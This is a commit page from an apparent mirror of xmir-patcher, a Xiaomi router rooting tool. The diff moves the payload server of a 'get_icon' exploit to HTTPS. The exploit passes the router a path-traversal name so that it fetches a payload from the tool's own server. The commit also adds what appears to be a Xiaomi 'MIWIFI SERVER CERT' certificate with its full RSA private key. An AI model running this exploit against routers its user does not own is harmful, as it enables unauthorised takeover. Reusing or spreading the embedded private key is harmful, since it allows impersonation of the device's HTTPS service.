aiden
/
xmir-patcher
mirror of https://github.com/openwrt-xiaomi/xmir-patcher
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

connect7: Use HTTPS server for receiving WEB-requests from Router

Browse Source
main
remittor 6 days ago
parent 4a9e1003b6
commit 3f4071ec99
3 changed files with 82 additions and 3 deletions
Show Stats Download Patch File Download Diff File

29
connect7.py
Unescape Escape View File

@ -36,25 +36,44 @@ if api_get_icon_status <= 0:
raise ExploitNotWorked('Exploit "get_icon" not working!!! (api not founded)') raise ExploitNotWorked('Exploit "get_icon" not working!!! (api not founded)')
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler from http.server import HTTPServer, SimpleHTTPRequestHandler
from http.server import BaseHTTPRequestHandler from http.server import BaseHTTPRequestHandler
from http import HTTPStatus from http import HTTPStatus
from http import server as http_server from http import server as http_server
srvInitEvent = threading.Event()
class XmirHttpServer(HTTPServer): class XmirHttpServer(HTTPServer):
timeout = 3 timeout = 3
retcode = 0 retcode = 0
def server_bind(self): def server_bind(self):
HTTPServer.server_bind(self) import ssl
root_dir = os.path.dirname(os.path.abspath(__file__))
certfile = f'{root_dir}\\data\\https\\cert.crt'
keyfile = f'{root_dir}\\data\\https\\cert.key'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.load_cert_chain(certfile = certfile, keyfile = keyfile)
self.socket = ctx.wrap_socket(self.socket, server_side = True)
super().server_bind()
def server_activate(self):
global srvInitEvent
super().server_activate()
print(f'SERVER: start and wait request from client...') print(f'SERVER: start and wait request from client...')
srvInitEvent.set()
def handle_timeout(self): def handle_timeout(self):
print(f"SERVER: Timed out! (timeout = {self.timeout})") print(f"SERVER: Timed out! (timeout = {self.timeout})")
self.retcode = -1 self.retcode = -1
def __del__(self): def __del__(self):
global srvInitEvent
print(f'SERVER: destroy with retcode = {self.retcode}') print(f'SERVER: destroy with retcode = {self.retcode}')
srvInitEvent.clear()
class HttpHandler(BaseHTTPRequestHandler): class HttpHandler(BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.1' protocol_version = 'HTTP/1.1'
@ -84,7 +103,7 @@ def wait_req_and_send_resp(path, data, bind_addr = '0.0.0.0', ret_code = None, t
srv = XmirHttpServer((bind_addr, srv_port), HttpHandler) srv = XmirHttpServer((bind_addr, srv_port), HttpHandler)
srv.action_path = path srv.action_path = path
srv.resp_body = data.encode('utf-8') if isinstance(data, str) else data srv.resp_body = data.encode('utf-8') if isinstance(data, str) else data
srv.timeout = 5 + timeout srv.timeout = timeout
srv.handle_request() srv.handle_request()
if isinstance(ret_code, list): if isinstance(ret_code, list):
ret_code[0] = srv.retcode ret_code[0] = srv.retcode
@ -145,12 +164,16 @@ def install_exploit(api = 'API/xqsystem/get_icon'):
# exploit public: https://archive.md/1PWkM # exploit public: https://archive.md/1PWkM
# discovery date: 2024-12-30 # discovery date: 2024-12-30
####### #######
global gw, srv_ip_addr, srv_port global gw, srv_ip_addr, srv_port, srvInitEvent
from threading import Thread from threading import Thread
srv_timeout = 3 srv_timeout = 3
ret_code = [ None ] ret_code = [ None ]
srvInitEvent.clear()
server = Thread(target = wait_req_and_send_resp, args = [ payload_name, payload_body, srv_ip_addr, ret_code, srv_timeout ]) server = Thread(target = wait_req_and_send_resp, args = [ payload_name, payload_body, srv_ip_addr, ret_code, srv_timeout ])
server.start() server.start()
event_set = srvInitEvent.wait(timeout = 15)
if not event_set:
raise RuntimeError(f'Cannot initialize custom HTTPS server on TCP port {srv_port}')
params = { 'ip': f'{srv_ip_addr}:{srv_port}', 'name': f'/../..{payload_name} dummy' } params = { 'ip': f'{srv_ip_addr}:{srv_port}', 'name': f'/../..{payload_name} dummy' }
resp = gw.api_request(api, params, stream = True, timeout = 12) resp = gw.api_request(api, params, stream = True, timeout = 12)
try: try:

29
data/https/cert.crt
Unescape Escape View File

@ -0,0 +1,29 @@
-----BEGIN CERTIFICATE-----
MIIFDDCCA/SgAwIBAgIUeha5V95blhAwY03e3h3H+xfT5gQwDQYJKoZIhvcNAQEL
BQAwdDELMAkGA1UEBhMCQ04xEDAOBgNVBAgTB0JlaUppbmcxEDAOBgNVBAcTB0Jl
aUppbmcxDzANBgNVBAoTBlhJQU9NSTEXMBUGA1UECxMOTUlXSUZJIFJPT1QgQ0Ex
FzAVBgNVBAMTDk1JV0lGSSBST09UIENBMCAXDTIwMTAzMDA4MjYyMVoYDzIxMjAx
MDMwMDg0NjIxWjB8MQswCQYDVQQGEwJDTjEQMA4GA1UECBMHQmVpSmluZzEQMA4G
A1UEBxMHQmVpSmluZzEPMA0GA1UEChMGWElBT01JMRswGQYDVQQLExJNSVdJRkkg
U0VSVkVSIENFUlQxGzAZBgNVBAMTEk1JV0lGSSBTRVJWRVIgQ0VSVDCCASIwDQYJ
KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK/Tas6ls0dQiBd++cEud+iTOY51aVdu
1dNkPucb6wc1NWUr0GT2pRnE0UpQDs3hH+TNETdzQ5fKR2bNDo7d9hpz2B2cnrYE
SPTH2m6BetVY+XOHusTs4x4y3c7H4Ny2F5Ak/cELzDubcbFYBidVVNaduffrozCw
p62Y2Jf3xyREuEwAqgge7B2sRU1ZSMTtIuTEV6dcqHHZWbSLN3YMZII1QMvYI0W9
mZZzRCLDHT+FPm8YPj+DRgbg2x8ZbMZ4ssAexv5iKp3zwI3C9UfVqGu1BK9022yK
TPlFFTxYPzeH7raD08OtPTT047veONAI1klJLCR0jlUeZq9+lLcQ4PkCAwEAAaOC
AYowggGGMA4GA1UdDwEB/wQEAwIDiDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNV
HRMBAf8EAjAAMB0GA1UdDgQWBBT8+kDf2DYqzu4izAU5T2XfUOfDsTAfBgNVHSME
GDAWgBRLf4ugE1zHbUCMpgbG2rDbzwK8JTCBhgYIKwYBBQUHAQEEejB4MC0GCCsG
AQUFBzABhiFodHRwOi8vY2EubWlvZmZpY2UuY24vbWl3aWZpLW9jc3AwRwYIKwYB
BQUHMAKGO2h0dHA6Ly9jYS5taW9mZmljZS5jbi9taXdpZmktY2FkYXRhL21pd2lm
aS1pbnRlcm1lZGlhdGUucGVtMDoGA1UdEQQzMDGCCm1pd2lmaS5jb22CEXJvdXRl
ci5taXdpZmkuY29thwTAqB8BhwR/AAABhwTAqAEBMEwGA1UdHwRFMEMwQaA/oD2G
O2h0dHA6Ly9jYS5taW9mZmljZS5jbi9taXdpZmktY2FkYXRhL21pd2lmaS1pbnRl
cm1lZGlhdGUuY3JsMA0GCSqGSIb3DQEBCwUAA4IBAQAK5BpgLojRv1ZJ/k6FQ5iz
Wk0xoIZ+opsrKNEyrcEQnMHVGLWVHtayzKSopnsFicelG+2ibPDpnSBNkBGiTZWa
RNpm+COBoGmvim/RX+ZKAmrrBvO6NI8pnGSBqyVKy8U4mJyL2DO17+YHRF3L1lcN
VtKG3k6c5vcywwLa8BPEKZYJMGKLfQVtK6DTkcTwWiusRJu7o3FspBvT0VNfJx4e
9VC52nofradxSihjqjVjxoM8+0deJw3Pi4HW+OEZ1VCLy7STu+sn6H2OTD7pCSFx
CQcBworO2KVMg/s5IRsMnJ3nzGUIgYrWuk1jeoM3qmYHsq9j6dLAsc8ev+OJzCiU
-----END CERTIFICATE-----

27
data/https/cert.key
Unescape Escape View File

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEAr9NqzqWzR1CIF375wS536JM5jnVpV27V02Q+5xvrBzU1ZSvQ
ZPalGcTRSlAOzeEf5M0RN3NDl8pHZs0Ojt32GnPYHZyetgRI9MfaboF61Vj5c4e6
xOzjHjLdzsfg3LYXkCT9wQvMO5txsVgGJ1VU1p259+ujMLCnrZjYl/fHJES4TACq
CB7sHaxFTVlIxO0i5MRXp1yocdlZtIs3dgxkgjVAy9gjRb2ZlnNEIsMdP4U+bxg+
P4NGBuDbHxlsxniywB7G/mIqnfPAjcL1R9Woa7UEr3TbbIpM+UUVPFg/N4futoPT
w609NPTju9440AjWSUksJHSOVR5mr36UtxDg+QIDAQABAoIBAQCur4X2OXqc583O
SkEpRVmsoFkWyGAYle2rUHWOd5ZSWvLpyVYKeWIe8ARfqJqMwZZGY9cvGD2XmUjH
QgOsvam9LksRYIHupOM3Dzhdghbf0L5FohxVemVLo43r23n0zpUqiRXzrh0DO7UB
VUsH2Seo8pvJTTudLGXre2f11B7uUBDUsvKS2zrJfP/uymlqsSddXag1tVDjb3gm
99IU7RFS3qWMoNKKOqAI/VksMe4H2sWUhG367wEs2g69xPBk+vudrZRaXw2UEFzf
zw40ztJDzMm8LgbabRYZITnApN8FeEOIbwrQVhruqSmWPYKhgWR8u0XWEY1Zypuk
Y6uoeDfhAoGBAOh4jAcFYFfl6uXhYX4WjC19OzgS3Y5VK0fR4av51kQbS63K2cik
k8xCdTCYUUmuFZsGPZqwGd5imf7kH7R3558oRHSASGB5U+PNWxRt8abOc+aDnrP3
L41GpfRIZpAviU83pcnpKrvVqQ5k90ywAFi5t2FgJw+6+kWjzuCkWOzXAoGBAMGf
KkCJ2ImRZg7ClOavqIHZoRGqFVRUWerrsIX+Xo0bA+YvfP0zXsrUPRnDNLwo4arV
3S1EH7l//4qDzqrWVpIYto03aU3jtmkoyNNnwfIg/D6QhSZC60aLv2uNoZq8CYiQ
MCaav/vtg0ju86hYwmuDjiIjrA/PTDX/ZAavZ5avAoGBAND8LcXSC355buYh6ycS
1gm+3xHVw99EqZfzElEsVHb9otcl2QsLCONDi16YT9tQ6JNo1NDPJzJIqe/+3JG8
iTkHViL1gBtadxP/dLW08NzoFEFSacWXneP/cwlcXPeaBHJ2sFAHkSczOLt8AOWs
A2O/8R9U9Uiq6nrYfA5vMJIZAoGBAIJPJ7WV0EkNtR0b8fCrqgHyQQfNa1t9BaMo
in4zqtjWpLInpbwW9aYWXyTWjshPz0kVdCzB24QR1B8aBF5PsKXUwg+aimGkbqCp
lTdKbmoRrxJAW4xbn1K0PNka0fd8tAHX4MAqiCj6OdA9GXlkezy2plLtpSBiyIzS
3DPvmwz7AoGBAOeor9RMP2BrPWBstvoB3VQ26wMISQtOF52ukPaaFYBhgBfMUjo7
dyhQblPT/VF622Nn1Y0qssXUod6tE0haREoipyK9gYryev5lD6ndd8gHVD1xz8FV
yjqN9LCOz6wBnskRJgYe6Tk02J3s13ZSRKKSZLDFYym/Yw3FlPUyPC3u
-----END RSA PRIVATE KEY-----
Write Preview
Loading…
Cancel
Save